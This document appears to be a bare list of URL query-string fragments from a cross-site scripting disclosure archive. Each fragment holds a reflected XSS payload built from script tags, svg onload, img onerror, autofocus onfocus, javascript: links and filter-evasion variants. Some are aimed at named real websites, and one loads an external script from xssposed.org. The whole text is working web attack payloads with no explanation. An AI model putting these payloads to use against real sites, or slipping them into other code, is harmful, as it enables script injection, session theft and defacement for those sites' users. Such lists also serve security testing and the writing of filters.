&q=%2527%3balert%28/XSSPOSED%29//\\%2527%3balert%281%29//%2522%3balert%28/XSSPOSED/%29//\\%2522%3balert%283%29//--%253E%253C/SCRIPT%253E%2522%253E%2527%253E%253CSCRIPT%253Ealert%28/XSSPOSED/%29%253C/SCRIPT%253E=&{}%2522%29%3b}alert%286%29%3bfunction+xss%28%29{//&q=%2527%3balert%280%29//\\%2527%3balert%281%29//%2522%3balert%282%29//\\%2522%3balert%283%29//--%253E%253C/SCRIPT%253E%2522%253E%2527%253E%253CSCRIPT%253Ealert%28/XSSPOSED/%29%253C/SCRIPT%253E=&{}%2522%29%3b}alert%286%29%3bfunction+xss%28%29{//
&fulltext=Search&search=%3Cimg%20src=x%20onerror=prompt%28/XSSPOSED/%29%3E
&flash=true&page=%27;alert(/XSSPOSED)//\\%27;alert(1)//%22;alert(2)//\\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(/XSSPOSED/)%3C/SCRIPT%3E=&{}%22);}alert(6);function+xss(){//&q=%27;alert(0)//\\%27;alert(1)//%22;alert(2)//\\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(/XSSPOSED/)%3C/SCRIPT%3E=&{}%22);}alert(6);function+xss(){//
&localeCode=en_US&complexSearchField=%27%22%3E%3C%2Ftitle%3E%3Cscript%3E+alert%28%22XSSPOSED%22%29%3C%2Fscript%3E%3E%2F&searchType=&propertyIds=&arrivalDate=&departureDate=
&action=search&firstRequest=1&searchindex=gsa&query=';alert(/XSSPOSED)//\\';alert(1)//";alert(2)//\\";alert(/XSSPOSED/)//--></SCRIPT>">'><SCRIPT>alert(/XSSPOSED/)</SCRIPT>=&{}");}alert(6);function+xss(){//&q=';alert(0)//\\';alert(1)//";alert(2)//\\";alert(/XSSPOSED/)//--></SCRIPT>">'><SCRIPT>alert(/XSSPOSED/)</SCRIPT>=&{}");}alert(6);function+xss(){//
&searchterm=%3CsVg%2FOnLOaD%3Dprompt%28%2FXSSPOSED%2F%29%3E&searchpath=%2Fcontent%2Fngaweb%2Fglobal-site-search-page&pageNumber=1
&col=&ht=0&qp=&qs=&qc=&pw=100%25&la=en&charset=iso-8859-1&si=1&ws=0&qm=0&ql=&qt=XSS&oldqt=%3Cscript%3E%28alert%29%28%22XSSPOSED%22%29%3C/script%3E
&mode=singleimage&handle=AdamGirard&number=%22%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29%3C/script%3E
&q=%3Cscript%2Fxss%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%2Fxss%3E
&q=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%28/XSSPOSED/%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F
&q=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F&header_submit=&src=usergen&ac=
&Amount=';alert(/XSSPOSED)//\\';alert(1)//";alert(2)//\\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(/XSSPOSED/)</SCRIPT>=&{}");}alert(6);function+xss(){//&q=';alert(0)//\\';alert(1)//";alert(2)//\\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(/XSSPOSED/)</SCRIPT>=&{}");}alert(6);function+xss(){//&From=USD&To=EUR
&q=%27;alert%28/XSSPOSED%29//\\%27;alert%281%29//%22;alert%282%29//\\%22;alert%283%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E=&{}%22%29;}alert%286%29;function+xss%28%29{//&q=%27;alert%280%29//\\%27;alert%281%29//%22;alert%282%29//\\%22;alert%283%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E=&{}%22%29;}alert%286%29;function+xss%28%29{//
&action=search&firstRequest=1&query=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F&x=30&y=17&searchindex=gsa
&keys=%27%22%3E%3C%2Ftitle%3E%3Cscript%3E+alert%28%22XSSPOSED%22%29%3C%2Fscript%3E%3E%2F
&spage=%27;alert%28/XSSPOSED%29//\\%27;alert%281%29//%22;alert%282%29//\\%22;alert%283%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E=&{}%22%29;}alert%286%29;function+xss%28%29{//&q=%27;alert%280%29//\\%27;alert%281%29//%22;alert%282%29//\\%22;alert%283%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E=&{}%22%29;}alert%286%29;function+xss%28%29{//
&search_string=%22%3E%3Cscript/xss%3Ealert%28/XSSPOSED/%29%3C/script/xss%3E
&msg_id=%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E
&q=%22%3E%3Cscript/xss%3Ealert%28/XSSPOSED/%29%3C/script/xss%3E
&clickTag=javascript:alert%28/XSSPOSED/%29
&clickTAG=javascript:alert%28/xssposed/%29
&s=XSSPOSED%27%29;};%3C/script%3E%3Cscript%3Ealert%28%20/XSSPOSED/%29%3C/script%3E%27
&smartapi!celexapi!prod!CELEXnumdoc&lg=en&numdoc=21994A0103%2801%29&model=guichett%22%3E%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E%27%22%3E
&error=catalogue.asp
&s=%22%3E%3C/script%3E%3Cbody/onfocus=%28alert%29%28/XSSPOSED/%29%3E
&q=0\\%22autofocus%2Fonfocus%3Dalert%28%2FXSSPO+SED%2F%29--%3E%3Cvideo%2Fposter%2Fonerror%3Dprompt%28%2FXSSPOSED%2F%29%3E%22-confirm%28%2FXSSPOSED%2F%29-%22&label=Department+of+Psychology&site=psych.ubc.ca
&src=%22%3E%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E
&q=0\\"autofocus/onfocus=alert(/XSSPO+SED/)--><video/poster/onerror=prompt(/XSSPOSED/)>"-confirm(/XSSPOSED/)-"
&url=http://m.mtv.com&css=%22%3E%3Cimg+src%3DX+onerror%3Dalert%28%22xssposed%22%29%3E
&SearchText=0\\%22autofocus%2Fonfocus%3Dalert%28%2FXSSPO+SED%2F%29--%3E%3Cvideo%2Fposter%2Fonerror%3Dprompt%28%2FXSSPOSED%2F%29%3E%22-confirm%28%2FXSSPOSED%2F%29-%22
&keywords=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F&per_page=15
&ShowForm=no&query=&lg=%3E%22%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E
&type=City&city=%22--%3E%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E
&TargetUrl=LST_NOM_DTL_GLOSSARY&StrNom=CODED2&StrLanguageCode=%22%3E%3Cmarquee/onstart=alert%28/XSSPOSED/%29%3E
&&fuseaction=tools.message&message=%22%3E%3Cvar%20onmouseover=%22prompt%28/XSSPOSED/%29%22%3EOn%20Mouse%20Over%3C/var%3E&title=Activity
&o=v&page=%3Cscript%20src=https://xssposed.org/1.js%3E%3C/script%3E&menu=111-222-1933bbq@bbq.bbq&site=assparade
&q=Quadrocopter</span ><script>alert(/XSSPOSED/);</script>
&article=Steve-Sjogren-Community-Servant-Evangelism&amp;ac=%22%3E%3CScRipT%3Econfirm%28/XSSPOSED/%29%3C%2FScrIpT%3E
&query=psychomantis&store_name=\\%27,init%29%29;}if%281==1%29{confirm%28/XSSPOSED/%29;//
&s=asd%3Cscript%3Ealert(/XSSPOSED/)%3C/script%3E
&method=email&error=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888,%2083,%2083,%2080,%2079,%2083,%2069,%2068%29%29;%3C/script%3E
&q=%22%20style=background:red;left:0;top:0;height:500px;width:500px;position%20:absolute;z-index:1000%20onmouseover=alert(/XSSPOSED/)%20%22
&site=stern_collection&client=stern_frontend&output=xml_no_dtd&proxystylesheet=stern_frontend&q=0\\%22autofocus%2Fonfocus%3Dalert%28%2FXSSPO+SED%2F%29--%3E%3Cvideo%2Fposter%2Fonerror%3Dprompt%28%2FXSSPOSED%2F%29%3E%22-confirm%28%2FXSSPOSED%2F%29-%22&x=9&y=4
&lingua=it%22----%3E%3E%27%27%3E%3Cscript%3Eprompt%28%27XSSPOSED%27%29%3C/script%3E
&q=aaaa%22%3E%3Cscript%20type=text/javascript%3Ealert%28%27XSSPOSED%27%29%3C/script%3E%3Cimg%20src=%22http://duckduckgo.com/assets/logo_homepage.normal.v101.png%22%3E%3C/img%3E
&s=0\\%22autofocus%2Fonfocus%3Dalert%28%2FXSSPO+SED%2F%29--%3E%3Cvideo%2Fposter%2Fonerror%3Dprompt%28%2FXSSPOSED%2F%29%3E%22-confirm%28%2FXSSPOSED%2F%29-%22
&s=%27%22%3E%3C%2Ftitle%3E%3Cscript%3E+alert%28%22XSSPOSED%22%29%3C%2Fscript%3E%3E%2F
&ref=%22/%3E0\\%22autofocus/onfocus=alert%28/XSSPO%20SED/%29--%3E%3Cvideo/poster/onerror=prompt%28/XSSPOSED/%29%3E%22-confirm%28/XSSPOSED/%29-%22
&Search=%22%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C/script%3E%3Cspan%20id=%22&Action=search&id=24093%3Bccom&Submit.x=10&Submit.y=5&Submit=Search
&q=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSSPOSED%2F%29%3E%3C!-+-
&x=0&y=0&q=%22%3E%3Cinput%20type=%22search%22%20onsearch=prompt(/XSSPOSED/)%20%20autofocus%3E%3C---Press+Enter++Mini+Textbox+To+trigger
&q=%22%3E%3C/title%3E%3Cscript%3E%28alert%29%28%22XSSPOSED%22%29%3C%2Fscript%3E%3E%2F&prefn1=brand&prefv1=carters
&q=%3Cscript%3E+alert(%22XSSPOSED%22)%3C/script%3E
&q=%22%3E%3CA+onmouseover%3Dalert%28%2FXSSPOSED%2F%29%3EXSS%2C+needs+to+be+fixed+ASAP%3C%2Fa%3E&type=Deseret+News&submit=Search
&l-id=gb_category_search
&q=XSSPOSED%27%29;};%3C/script%3E%3Cscript%3Ealert%28%20/XSSPOSED/%29%3C/script%3E%27
&q=%22%3Cscript%3E+alert%28%22XSSPOSED%22%29%3C%2Fscript%3E%3E
&q=%22%3E%3Cbody/onpageshow=%28alert%29%28/XSSPOSED/%29%3E&kw=lol&x=0&y=0
&q=%3C/script%3E%3Cscript%3Ejavascript:alert(/XSSPOSED/)%3C/script%3E
&height=360&imagePath=/content/us/en/food/food_quality/see_what_we_are_made_of/inside_our_kitchens/jcr:content/genericpagecontent/video_1/stillimage.img.jpg/1270296485736.jpg%22%3E%3Cmarquee/onstart=confirm%28/XSSPOSED/%29%3E&link=/content/us/en/food/food_quality/see_what_we_are_made_of/inside_our_kitchens.html&path=sss
&q=%27;}--%3E%3C/script%3E%3Cscript%3Ejavascript:alert(/XSSPOSED/)%3C/script%3E
&search=%27%22%3Cmarquee%3E%3Cimg+src=x+onerror=confirm%28/XSSPOSED/%29%3E
&q=%22%3E%3Cscript%3E+alert%28%22XSSPOSED%22%29%3C/script%3E%3E/
&q=%27%3E%3C/script%3E%3Cscript%3Ejavascript:alert(/XSSPOSED/)%3C/script%3E
&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%3E+alert%28%22XSSPOSED%22%29%3C%2Fscript%3E%3E%2F&sort=newest&date-range=any&type=all&section=all
&nameCodeText="><img+src=x+onerror=prompt('XSSPOSED')>&searchType=searchForNameCode&nameCode="><img+src=x+onerror=prompt('XSSPOSED')>&text=&rnsSubmitButton=Search&activatedFilters=false&newsSource=ALL&mostRead=&headlineCode=ONLY_EARNINGS_NEWS&headlineId=&ftseIndex=&sectorCode=&rbDate=released&preDate=Today&newsPerPage=20
&cnpage=%22%3E%3Cscript%3E+-+-1-+-+alert%28/XSSPOSED/%29%3C/script%3E
&entry_id=%22%3E%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
&q=%22%3E%3Cscript%3Ea=eval;b=alert;a%28b%28/XSSPOSED/.source%29%29;%3C/script%3E%3E/&l=
&query=%27%22%3E%3C/script%3E%3Cmarquee/onstart=confirm%28document.domain%29%3E%3E&activeTabIndex=1&searchContext=Personal&loggedIn=false&site=shop
&type=itpPeople&pageLength=5&q=0\\%22autofocus%2Fonfocus%3Dalert%28%2FXSSPO+SED%2F%29--%3E%3Cvideo%2Fposter%2Fonerror%3Dprompt%28%2FXSSPOSED%2F%29%3E%22-confirm%28%2FXSSPOSED%2F%29-%22
&q=Psycho_Mantis%22%3E%3Csvg/onload=alert(document.domain)%3C%22
&i=WmYmMm28
&q=foobar&after=fizzbuzz
&page=%22%3E%3CScRipT%3Ealert%28/xssposed/%29%3C%2FScrIpT%3E
&gws_rd=ssl#q=inurl:ReferralType%3DW
&list=PLpr-xdpM8wG-ZTcHhFfAeBthNVZVEtkg9
&uGlobalSearch=%22%3E%3Ch1+onmouseenter%3Dconfirm%28%2Fxssposed%2F%29%3E
&cmd=browse&project=999999.9%27%22%3E%3CA%20onmouseover=alert%28/XSSPOSED/%29%3EXSS,%20needs%20to%20be%20fixed%20ASAP%3C/a%3E
&product=prints&q=%22-confirm%28/XSSPOSED/%29-%22
&q=%22%3Exss%3Cvideo/poster/onerror=prompt%28/XSSPOSED/%29%3E
&sortBy=mngi&similarTo=&similarType=find&type=any&aff=3&view=entiresitesppublished&query=PsychoMantis%27/confirm(/xssposed/)/%27
&id_menu=%22%3E%3Csvg/onload=alert%28/xssposed/%29%20%3E
&keyword=%22%3EXSS%3Csvg/onload=alert%28/xssposed/%29%3E&fname=&lname=&unit=&submit=Search
&config=htdig&amp;restrict=&amp;exclude=&amp;method=and&amp;format=long&amp;sort=score&amp;words=%22%3E%20d%3Csvg/onload=confirm%28/xssposed/%29%3E
&styper=query&sword=%3Cscript%20/***/%3E/***/confirm%28document.domain%29/***/%3C/script%20/***/&Start+Search.x=0&Start+Search.y=0
&true&lenta=1'"\\></title><svg/onload=confirm(/xssposed/)>
&show=24&brand=a"/><svg/onload="a=alert;a('XSS')
&searchTerm="><svg onload='a=alert;a("XSSPOSED")'><"&defaultSearch=None&search=
